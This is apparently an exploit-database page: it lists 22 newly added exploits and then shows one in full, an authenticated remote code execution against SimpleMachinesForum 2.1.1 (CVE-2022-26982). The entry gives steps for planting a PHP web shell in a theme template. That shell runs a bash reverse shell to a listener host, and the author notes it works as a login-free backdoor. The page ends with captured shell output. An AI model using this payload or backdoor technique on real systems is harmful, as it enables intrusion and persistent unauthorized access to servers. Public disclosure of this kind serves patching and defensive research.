
22 changes to exploits/shellcodes/ghdb Password Manager for IIS v2.0 - XSS DLink DIR 819 A1 - Denial of Service D-Link DNR-322L <=2.60B15 - Authenticated Remote Code Execution Abantecart v1.3.2 - Authenticated Remote Code Execution Bus Pass Management System 1.0 - Cross-Site Scripting (XSS) Composr-CMS Version <=10.0.39 - Authenticated Remote Code Execution Employee Performance Evaluation System v1.0 - File Inclusion and RCE GuppY CMS v6.00.10 - Remote Code Execution Human Resources Management System v1.0 - Multiple SQLi ImpressCMS v1.4.3 - Authenticated SQL Injection Lavalite v9.0.0 - XSRF-TOKEN cookie File path traversal MODX Revolution v2.8.3-pl - Authenticated Remote Code Execution NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi Online Diagnostic Lab Management System v1.0 - Remote Code Execution (RCE) (Unauthenticated) PHPGurukul Online Birth Certificate System V 1.2 - Blind XSS SimpleMachinesForum v2.1.1 - Authenticated Remote Code Execution Translatepress Multilinugal WordPress plugin < 2.3.3 - Authenticated SQL Injection Yoga Class Registration System v1.0 - Multiple SQLi NVFLARE < 2.1.4 - Unsafe Deserialization due to Pickle _camp_ Raspberry Pi camera server 1.0 - Authentication Bypass System Mechanic v15.5.0.61 - Arbitrary Read/Write
27 lines
No EOL
1.5 KiB
Text
27 lines
No EOL
1.5 KiB
Text
# Exploit Title: SimpleMachinesForum v2.1.1 - Authenticated Remote Code Execution
|
|
# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane)
|
|
# Date: 7th March 2022
|
|
# CVE ID: CVE-2022-26982
|
|
# Confirmed on release 2.1.1
|
|
# Vendor: https://download.simplemachines.org/
|
|
# Note- Once we insert the vulnerable php code, we can even execute it without any valid login as it is not required! We can use it as a backdoor!
|
|
|
|
###############################################
|
|
#Step1- Login with Admin Credentials
|
|
#Step2- Goto Admin=>Main=>Administration Center=>Configuration=>Themes and Layout=>Modify Themes=>Browse the templates and files in this theme.=>Admin.template.php
|
|
#Step3- Now add the vulnerable php reverse tcp web shell exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.1/4477 0>&1'"); ?>
|
|
#Step4- Now Goto Add Media=>Add Resource=> Upload php web shell and click on SAVE CHANGES at the bottom of the page
|
|
#Step5- Now click on "Themes and Layout" and you will get the reverse shell:
|
|
E.g: Visit http://IP_ADDR/index.php?action=admin;area=theme;b4c2510f=bc6cde24d794569356b81afc98ede2c2 and get the reverse shell:
|
|
|
|
listening on [any] 4477 ...
|
|
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.130] 41276
|
|
bash: cannot set terminal process group (1334): Inappropriate ioctl for device
|
|
bash: no job control in this shell
|
|
daemon@debian:/opt/bitnami/simplemachinesforum$ whoami
|
|
whoami
|
|
daemon
|
|
daemon@debian:/opt/bitnami/simplemachinesforum$ id
|
|
id
|
|
uid=1(daemon) gid=1(daemon) groups=1(daemon)
|
|
daemon@debian:/opt/bitnami/simplemachinesforum$ |